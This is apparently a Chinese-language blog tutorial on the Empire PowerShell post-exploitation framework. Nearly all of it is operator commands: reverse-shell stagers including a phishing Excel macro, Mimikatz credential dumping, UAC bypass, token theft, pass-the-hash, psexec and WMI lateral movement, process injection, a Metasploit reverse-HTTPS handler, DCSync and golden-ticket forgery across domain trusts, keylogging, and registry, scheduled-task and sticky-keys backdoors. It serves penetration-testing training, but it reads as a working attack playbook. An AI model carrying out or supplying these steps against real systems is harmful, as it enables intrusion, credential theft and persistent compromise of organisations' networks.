后渗透测试神器Empire详解

2017-09-11 10:46:38 backlion 先知安全技术社区

一、前言

Empire是一个PowerShell后期漏洞利用代理工具同时也是一款很强大的后渗透测神器,它建立在密码学、安全通信和灵活的架构之上。Empire实现了无需powershell.exe就可运行PowerShell代理的功能。快速部署后期漏洞利用模块,从键盘记录器到Mimikatz,并且能够适应通信躲避网络检测,所有的这些功能都封装在一个以实用性为重点的框架中

二、empire使用详解

1.Empire 的安装

wget https://raw.githubusercontent.com/backlion/demo/master/Empire-master.zip
unzip Empire-master.zip
cd  Empire-master
cd setup/
./install.sh
(最后输入数据库密码)

注意:新版本貌似有点小问题,我这里采用2015年旧版本可以正常使用.新版本命令有所改变。

重新恢复到初始状态:

root@backlion:/opt/Empire-master# cd setup/
root@backlion:/opt/Empire-master/setup# ls
root@backlion:/opt/Empire-master/setup#

2.简单命令使用

cd  Empire-master
./empire

(Empire) > help  #主菜单帮助命令

(Empire) > listeners  #查看本地监听代理地址,现在还没有会话代理,所以为空

(Empire: listeners) > info  #列出详细信息

(Empire: listeners) > set Name bk  #设置Name为bk

(Empire: listeners) > execute  #执行命令,这条命令将其name设置生效

(Empire: listeners) > usestager launcher bk  #调用posershell模块并, name为bk

(Empire: agents) > interact USSZC2P1XCTBKYGH

(Empire: USSZC2P1XCTBKYGH) > upload  /tmp/test.hta  #文件上传

(Empire: USSZC2P1XCTBKYGH) > shell dir

(Empire: USSZC2P1XCTBKYGH) > download test.hta  #文件下载

代理监听IP地址更改:

通过kali下的SQLiteBrowser打开empire下data目录下的数据库empire.db修改监听IP

3.生成反弹shell代理:

3.1 posershell反弹shell代理

(Empire: listeners) > usestager(空格+tab)  #查看usestager监听模块

(Empire: listeners) > usestager launcher test   #调用powershell模块,test为name名称,这里的name需要提前设置,否则无法导入模块

(Empire: stager/launcher) > execute  #执行命令

将上面生成的posershell命令在win7及系统以上执行:

执行命令后Empire端会显示监听成功:

3.2 vbs反弹shell代理

(Empire: listeners) > usestager launcher_vbs test

(Empire: stager/launcher_vbs) > execute #执行命令

将launcher.vbs拷贝到目标主机上执行:

执行命令后Empire端显示监听成功:

(Empire: stager/launcher_vbs) > execute

3.3 钓鱼宏代理

在empire端执行:

(Empire: listeners) > usestager macro bk
(Empire: stager/macro) > info
(Empire: stager/macro) > execute
root@backlion:~#cat  /tmp/macro

将生产的代码复制创建到execl的宏代码中:

这里是将保存为execl2003的文档并执行:

4.代理界面的命令使用

(Empire: stager/launcher_vbs) > agents  #查看代理情况,带有(*)的是已被提升过的代理,可通过bypassuac进行提权

(Empire: agents) > rename EEDLABPF43FAGWHZ  DC #重新命名代理名

(Empire: agents) > list  #列出代理

(Empire: agents) > list stale  #列出已丢失反弹代理

(Empire: agents) > remove stale #删除已丢失反弹代理

(Empire: agents) > list

(Empire: agents) > interact Y1DMVFG4CGKB24KP  #进入到某个代理主机中,这里注意的是带有*的用户名对应的代理是具有管理员高权限代理。如果是没有需要提权。

(Empire: Y1DMVFG4CGKB24KP) > help  #代理界面的命令使用帮助

(Empire: TKRTTL2V3BNRVDK4) > mimikatz  #加载mimikatz获取hash

(Empire: TKRTTL2V3BNRVDK4) > creds  #查看所有hash值包括明文

(Empire: DGPWHW4E2Z2NT3PL) > creds krbtgt  #搜索特定用户的krbtgt

(Empire: DGPWHW4E2Z2NT3PL) > creds plaintext   #搜索hash中的明文

(Empire: DGPWHW4E2Z2NT3PL) > creds  hash #列出所有hash值(不包括明文)

(Empire: DGPWHW4E2Z2NT3PL) > creds export /opt/hash.csv  #导出hash凭证到指定的格式

root@backlion:/opt# cat hash.csv

(Empire: TKRTTL2V3BNRVDK4) > shell ipconfig  #查看IP地址

(Empire: TKRTTL2V3BNRVDK4) > shell net localgroup  administrators #查看管理员组

(Empire: TKRTTL2V3BNRVDK4) > back  #返回上一层

5.模块化使用案列:

5.1检查UAC提权方法模块

(Empire: agents) > interact  P2V4CXEGRPHUD43T  #进入到代理主机

(Empire: P2V4CXEGRPHUD43T) > usemodule(空格+tab键) #查看usemodule的模块,注意需要在进入到代理主机才能使用该模块,UAC提权需要是管理员组的用户才行

(Empire: P2V4CXEGRPHUD43T) > usemodule  privesc/powerup/allchecks  #检查提权方法模块

(Empire: privesc/powerup/allchecks) > execute  #执行检查

(Empire: privesc/powerup/allchecks) > back #返回上一命令界面

5.2 UAC提权模块

(Empire: P2V4CXEGRPHUD43T) > bypassuac test  #执行uac提权,这里的test就是默认的name,可以自定义,貌似有问题,建议默认就可以了。

(Empire: P2V4CXEGRPHUD43T) > agents  #查看到提权后UAC的name对应主机(带有*的用户的name,表示代理已提权过)

(Empire: agents) > interact   P2V4CXEGRPHUD43T  #进入提权后的的uac主机

(Empire: P2V4CXEGRPHUD43T) > ps #查看进程

5.3 本地管理组访问模块

(Empire: HPEUGGBSPSAPWGZW) >usemodule situational_awareness/network/find_localadmin_access  #加载本地管理组访问模块

(Empire: situational_awareness/network/find_localadmin_access) > info #查看信息

(Empire: situational_awareness/network/find_localadmin_access) > execute #执行命令

(Empire: situational_awareness/network/find_localadmin_access) > back  #返回上一命令界面

5.4用户账号枚举信息

(Empire: HPEUGGBSPSAPWGZW) > situational_awareness/network/get_use 
(Empire: situational_awareness/network/get_user) > set UserName  bk
(Empire: situational_awareness/network/get_user) > set Domain bk.com
(Empire: situational_awareness/network/get_user) > execute #这里可以累出具体某个用户的信息

5.5网络用户会话登录情况

(Empire: HPEUGGBSPSAPWGZW) >usemodule situational_awareness/network/userhunter
(Empire: situational_awareness/network/userhunter) > info
(Empire: situational_awareness/network/userhunter) > execute  #这里可以清楚得到那个用户登录给某台主机

5.6 网络扫描

(Empire: HPEUGGBSPSAPWGZW) > shell ping  -a -n 1  192.168.99.104 #这里ping管理员登录过的会话IP地址所得到主机名
(Empire: HPEUGGBSPSAPWGZW) > usemodule  situational_awareness/network/arpscan
(Empire: situational_awareness/network/arpscan) > info
(Empire: situational_awareness/network/arpscan) > set Range 10.0.0.100-10.0.0.254
(Empire: situational_awareness/network/arpscan) > info
(Empire: situational_awareness/network/arpscan) > execute

5.6 DNS信息获取

(Empire: situational_awareness/network/arpscan) >usemodule situational_awareness/network/reverse_dns
(Empire: situational_awareness/network/reverse_dns) > info
(Empire: situational_awareness/network/reverse_dns) > execute

5.7 共享文件

(Empire: situational_awareness/network/reverse_dns) >usemodule situational_awareness/network/sharefinder
(Empire: situational_awareness/network/sharefinder) > info
(Empire: situational_awareness/network/sharefinder) > set  CheckShareAccess  True
(Empire: situational_awareness/network/sharefinder) > execute

5.8 会话令牌偷取获取目标访问权限

(Empire: agents) > interact S4DU3VSRKR3U1DDF
(Empire: S4DU3VSRKR3U1DDF) > ps cmd
(Empire: S4DU3VSRKR3U1DDF) > steal_token  3716
(Empire: S4DU3VSRKR3U1DDF) > shell dir \\SCAN03\c$

5.9 psexec模块横向生成一个反弹代理

(Empire: S4DU3VSRKR3U1DDF) > usemodule lateral_movement/invoke_psexec
(Empire: lateral_movement/invoke_psexec) > info
(Empire: lateral_movement/invoke_psexec) > set Listener test
(Empire: lateral_movement/invoke_psexec) > set ComputerName SCAN03
(Empire: lateral_movement/invoke_psexec) > execute
Empire: lateral_movement/invoke_psexec) > agents

5.10 会话注入得到反弹代理

(Empire: agents) > interact YU3NGBFBPGZTV1DD
(Empire: YU3NGBFBPGZTV1DD) > ps cmd
(Empire: YU3NGBFBPGZTV1DD) > usemodule management/psinject
(Empire: management/psinject) > info
(Empire: management/psinject) > set ProcId 6536 #注入进程建议是lass.exe对应的进程
(Empire: management/psinject) > set  Listener test
(Empire: management/psinject) > execute
(Empire: management/psinject) > agents

5.11 Empire和msf的联动

在empire终端执行:

(Empire: agents) > interact XCLLHZZPAWPN1REL
(Empire: XCLLHZZPAWPN1REL) > usemodule code_execution/invoke_shellcode
(Empire: code_execution/invoke_shellcode) > info
(Empire: code_execution/invoke_shellcode) > set Lhost  10.0.0.86
(Empire: code_execution/invoke_shellcode) > set Lport 4433
(Empire: code_execution/invoke_shellcode) > execute

在msf终端执行(这里和empire同一个主机上)

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf exploit(handler) > set lhost 10.0.0.86
msf exploit(handler) > set lport 4433
msf exploit(handler) > set exitsession false
msf exploit(handler) > exploit -j

5.12  pass  the  hash

(Empire: XCLLHZZPAWPN1REL) > creds
(Empire: XCLLHZZPAWPN1REL) > pth  7  #进入到令牌pth的cerdiD值
(Empire: XCLLHZZPAWPN1REL) > steal_token  12004  #偷取令牌PID值
(Empire: XCLLHZZPAWPN1REL) > dir  \\SCAN03\c$ #利用获取到目标令牌会话来访问目标权限的共享目录
(Empire: XCLLHZZPAWPN1REL) > revtoself   #将恢复令牌权限回到原来的状态。

5.13 psexec横向渗透

(Empire: HPEUGGBSPSAPWGZW) > usemodule lateral_movement/invoke_psexec #使用该模块横向渗透
(Empire: lateral_movement/invoke_psexec) > info 
(Empire: lateral_movement/invoke_psexec) > set ComputerName SCAN03.bk.com 
(Empire: lateral_movement/invoke_psexec) > set Listener test
(Empire: lateral_movement/invoke_psexec) > execute

5.14 域的krbtgt值

(Empire: EEDLABPF43FAGWHZ) > usemodule credentials/mimikatz/dcsync  #获取域的krbtgt值,这里注意的是域需要域管理员身份才能获取,普通工作组账户的krbtgt需要管理员身份
(Empire: credentials/mimikatz/dcsync) > set user dc2\krbtgt
(Empire: credentials/mimikatz/dcsync) > info
(Empire: credentials/mimikatz/dcsync) > execute

5.15 Golden Tickets

(Empire: EEDLABPF43FAGWHZ) > usemodule credentials/mimikatz/golden_ticket
(Empire: credentials/mimikatz/golden_ticket) > creds
(Empire: credentials/mimikatz/golden_ticket) > set CredID 1
(Empire: credentials/mimikatz/golden_ticket) > set user  administrator
(Empire: credentials/mimikatz/golden_ticket) > execute
(Empire: credentials/mimikatz/golden_ticket) >usemodule credentials/mimikatz/purge  #清理黄金票据会话
(Empire: credentials/mimikatz/golden_ticket) > execute

5.16 获取系统日志事件

(Empire: situational_awareness/network/reverse_dns) >usemodule situational_awareness/host/computerdetails
(Empire: situational_awareness/host/computerdetails) > info
(Empire: situational_awareness/host/computerdetails) > execute

5.17 收集目标主机有用的信息

(Empire: agents) > interact EEDLABPF43FAGWHZ
(Empire: EEDLABPF43FAGWHZ) > usemodule situational_awareness/host/winenum
(Empire: situational_awareness/host/winenum) > info
(Empire: situational_awareness/host/winenum) > info

5.18 查看网络共享

(Empire: EEDLABPF43FAGWHZ) >usemodule  situational_awareness/network/stealth_userhunter
(Empire: situational_awareness/network/stealth_userhunter) > info
(Empire: situational_awareness/network/stealth_userhunter) > execute

5.19 桌面截屏

(Empire: USSZC2P1XCTBKYGH) > usemodule collection/screenshot
(Empire: collection/screenshot) > info
(Empire: collection/screenshot) > execute

(Empire: collection/screenshot) > usemodule collection/keylogger
(Empire: collection/keylogger) > info
(Empire: collection/keylogger) > execute

5.20 权限持久性的注册表注入

(Empire: EEDLABPF43FAGWHZ) > usemodule persistence/userland/registry
(Empire: persistence/userland/registry) > info
(Empire: persistence/userland/registry) > set Listener bk
(Empire: persistence/userland/registry) >set RegPath HKCU:Software\Microsoft\Windows\CurrentVersion\Run
(Empire: persistence/userland/registry) > execute

5.21 权限持久性的计划任务注册

在empire上执行计划任务:

(Empire: WC1PKXFTA4KNTFN4) > usemodule persistence/userland/schtasks
(Empire: persistence/userland/schtasks) > info
(Empire: persistence/userland/schtasks) > set Listener bk
(Empire: persistence/userland/schtasks) > set DailyTime  05:00
(Empire: persistence/userland/schtasks) >set RegPath HKCU:SOFTWARE\Microsoft\Windows\CurrentVersion\Run
(Empire: persistence/userland/schtasks) > execute

同时在目标主机上查看计划任务和注册表情况可以看到成功创建:

5.22 权限持久性的AD用户是否存在触发

(Empire: AG2RV3CFLLY4PZZ4) > usemodule persistence/powerbreach/deaduser
(Empire: persistence/powerbreach/deaduser) > info
(Empire: persistence/powerbreach/deaduser) > set Username  DC2\test
(Empire: persistence/powerbreach/deaduser) > set Listener bk
(Empire: persistence/powerbreach/deaduser) > execute

只要AD域管理员上修改用户名或者删除用户名就会触发生产后门,这里是将test用户修改为bk,马上触发条件。

5.21权限持久性劫持shift后门

(Empire: ASMR14VVZG4A33AE) > usemodule lateral_movement/invoke_wmi_debugger
(Empire: lateral_movement/invoke_wmi_debugger) > info
(Empire: lateral_movement/invoke_wmi_debugger) > set Listener  bk
(Empire: lateral_movement/invoke_wmi_debugger) > set TargetBinary sethc.exe
\#注意这里可以将sethc.exe替换为Utilman.exe(快捷键为: Win + U)或者osk.exe(屏幕上的键盘Win + U启动再选择)Narrator.exe (启动讲述人Win + U启动再选择) Magnify.exe(放大镜Win + U启动再选择)
(Empire: lateral_movement/invoke_wmi_debugger) > set ComputerName  CLINCET2
(Empire: lateral_movement/invoke_wmi_debugger) > execute

在目标主机上远程登录的时候按5次shift即可触发后门代理

6.子域和父域的信任跳转

  1. lab.local和dev.lab.local分别为父域和子域,现已得到子域的反弹代理。

  2. 在子域上通过:

usemodule   situational_awareness/network/powerview/get_domain_trust模块来检查子域和父域的信任关系(dev.lab.local 和他的父域lab.local是双向信任,子域的DA证书来控制整个域)

  1. 得到父域lab.local的LAB\krbtg账号sid值,这里使用模块

usemodule management/user_to_sid,并设置域,以及用户名

4.通过模块usemodule credentials/mimikatz/dcsync获取子域账号krbtgt的hash值,这里只需设置子域账号即可

5.通过creds  krbtget 搜索子域krbtget的hash值:

6.通过黄金票据来伪造(usemodule credentials/mimikatz/golden_ticket)父域lab.local\Enterprise管理员账号,这里需要设置伪造的用户为子域中的一个普通账号,设置sids为父域krbtget的sid值需要把后面的502改成519,最后执行

7.通过模块usemodule credentials/mimikatz/dcsync获取父域账号krbtgt的hash值,这里只需设置子域账号,以及父域的名称

8.再次通过creds krbtgt搜索出hash 值可得到父域的hash值:

9.子域具有访问父域的共享文件权限

(Empire: DGPWHW4E2Z2NT3PL) >usemodule credentials/mimikatz/golden_ticket t
(Empire: DGPWHW4E2Z2NT3PL) > set CredID 14
(Empire: DGPWHW4E2Z2NT3PL) > set user lolhax
(Empire: DGPWHW4E2Z2NT3PL) >set sids 95505cle3d98a458128845353b988
(Empire: DGPWHW4E2Z2NT3PL) >execute

三、emprie总结

通过一系列学习emprie功能,它可以联动MSF进行更为强大的后渗透测试,甚至包括强大的权限持久性以及对域的渗透丰富功能模块。